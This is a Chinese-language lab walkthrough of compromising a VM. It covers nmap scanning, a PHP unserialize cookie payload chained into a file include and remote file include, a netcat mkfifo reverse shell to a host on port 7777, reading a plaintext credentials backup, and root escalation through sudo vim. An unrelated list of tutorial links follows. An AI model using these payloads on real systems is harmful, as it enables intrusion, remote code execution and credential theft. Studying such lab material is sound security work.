php反序列化到getshell
0x01 扫描存活,端口
C:\Users\Administrator>nmap -sn -PR -T 4 192.168.18.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-16 16:00 ?D1ú±ê×?ê±??
Nmap scan report for 192.168.18.254
Host is up (0.00s latency).
MAC Address: 00:50:56:F5:8E:EC (VMware)
Nmap scan report for 192.168.18.1
Host is up.
Nmap scan report for 192.168.18.128
Host is up (0.0010s latency).
MAC Address: 00:0C:29:6B:45:F3 (VMware)
Nmap done: 256 IP addresses (3 hosts up) scanned in 29.30 seconds
C:\Users\Administrator>nmap 192.168.18.128
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-16 16:00 ?D1ú±ê×?ê±??
Nmap scan report for 192.168.18.128
Host is up (0.00s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:6B:45:F3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 11.34 seconds
0x02 Web
Request:
GET / HTTP/1.1
Host: 192.168.18.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: user=Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjM6InNrNCI7czo5OiIAVXNlcgB3ZWwiO086NzoiV2VsY29tZSI6MDp7fX0%3D
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Date: Wed, 16 Sep 2020 08:04:41 GMT
Server: Apache/2.4.38 (Ubuntu)
Content-Length: 52
Connection: close
Content-Type: text/html; charset=UTF-8
Hello sk4This is a beta test for new cookie handler
可以看到cookie里面user值为一个base64加密,解密一下
O:4:"User":2:{s:10:" User name";s:3:"sk4";s:9:" User wel";O:7:"Welcome":0:{}}
这里改为
O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:7:"Welcome":0:{}}
试试
C:\Users\Administrator>python
Python 3.8.0 (tags/v3.8.0:fa919fd, Oct 14 2019, 19:37:50) [MSC v.1916 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> import base64
>>> s = base64.b64encode(b'O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:7:"Welcome":0:{}}')
>>> print(s)
b'Tzo0OiJVc2VyIjoyOntzOjEwOiIgVXNlciBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IiBVc2VyIHdlbCI7Tzo3OiJXZWxjb21lIjowOnt9fQ=='
>>>
返回为500,把空格替换为\x00试试
Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7Tzo3OiJXZWxjb21lIjowOnt9fQ==
0x03 代码审计
确实ok但是没啥用继续扫下目录,得到一个backup目录为网站备份文件
index.php
<?php
include("user.class.php");
if(!isset($_COOKIE['user'])) {
setcookie("user", base64_encode(serialize(new User('sk4'))));
} else {
unserialize(base64_decode($_COOKIE['user']));
}
echo "This is a beta test for new cookie handler\n";
?>
user.class.php
<?php
include("log.class.php");
class Welcome {
public function handler($val) {
echo "Hello " . $val;
}
}
class User {
private $name;
private $wel;
function __construct($name) {
$this->name = $name;
$this->wel = new Welcome();
}
function __destruct() {
//echo "bye\n";
$this->wel->handler($this->name);
}
}
?>
log.class.php
<?php
class Log {
private $type_log;
function __costruct($hnd) {
$this->$type_log = $hnd;
}
public function handler($val) {
include($this->type_log);
echo "LOG: " . $val;
}
}
?>
看到index.php可以看到new了一个user对象,然后通过序列化加base64加密
转到user.class.php
因为new了一个对象所以执行construct(),然后destruct()的时候调用handler方法输出sk4
转到log.class.php,可以很明确的看到有个文件包含
这里构造payload就很简单了
O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}
但是这里的空格用\x00转义一下然后同理bs4转码
>>> s = base64.b64encode(b'O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}')
>>> print(s)
b'Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ=='
>>>
0x04 getshell
远程包含我们本地的1.txt,内容为
>>> base64.b64encode(b'O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:25:"http://192.168.18.1/1.txt";}}')
b'Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MjU6Imh0dHA6Ly8xOTIuMTY4LjE4LjEvMS50eHQiO319'
>>>
返回反弹shell
GET /?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.18.129+7777+>/tmp/f HTTP/1.1
Host: 192.168.18.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: user=Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MjU6Imh0dHA6Ly8xOTIuMTY4LjE4LjEvMS50eHQiO319
Upgrade-Insecure-Requests: 1
Content-Length: 0
0x05 提权
$ cd /
$ ls
bin
boot
cdrom
credentials.txt.bak
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
swapfile
sys
tmp
usr
var
vmlinuz
vmlinuz.old
$ cat credentials.txt.bak
sk4:KywZmnPWW6tTbW5w
$
在根目录下发现敏感文件得到密码
ssh登录成功
sk4@sk4-VM:~$ id
uid=1000(sk4) gid=1000(sk4) groups=1000(sk4),24(cdrom),30(dip),46(plugdev),118(lpadmin),129(sambashare)
sk4@sk4-VM:~$ uname -a
Linux sk4-VM 5.0.0-25-generic #26-Ubuntu SMP Thu Aug 1 12:04:58 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
sk4@sk4-VM:~$ cat /etc/issue
Ubuntu 19.04 \n \l
sudo -l发现vim可以任意用户使用nopasswd
sk4@sk4-VM:~$ sudo -l
Matching Defaults entries for sk4 on sk4-VM:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sk4 may run the following commands on sk4-VM:
(ALL) NOPASSWD: /usr/bin/vim
执行sudo vim
root@sk4-VM:~# id
uid=0(root) gid=0(root) groups=0(root)
root@sk4-VM:~#
原文地址:https://www.cnblogs.com/yicunyiye/p/13680228.html
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- Centos下安装Ansible的示例代码
- ubuntu18.04安装搜狗拼音的简易教程
- linux中$符号的基础用法总结
- Linux下的 mariadb 使用 root 用户启动方式(推荐)
- window与linux项目部署之linux文件路径不存在问题
- Ubuntu 18.04安装 pyenv、pyenv-virtualenv、virtualenv、Numpy、SciPy、Pillow、Matplotlib
- Linux使用 iftop 实时监控网卡的流量
- Centos中TCPWrappers访问控制实现
- CentOS7 重新分配分区大小的实现方法
- Linux 下安装pip包的方法
- Linux系统设置PATH环境变量(3种方法)
- leetcode栈之有效的括号
- linux系统安装iso文件方法
- xshell 远程登陆CentOS7 免密登陆的思路详解
- Linux服务器下Nginx与Apache共存的实现方法分析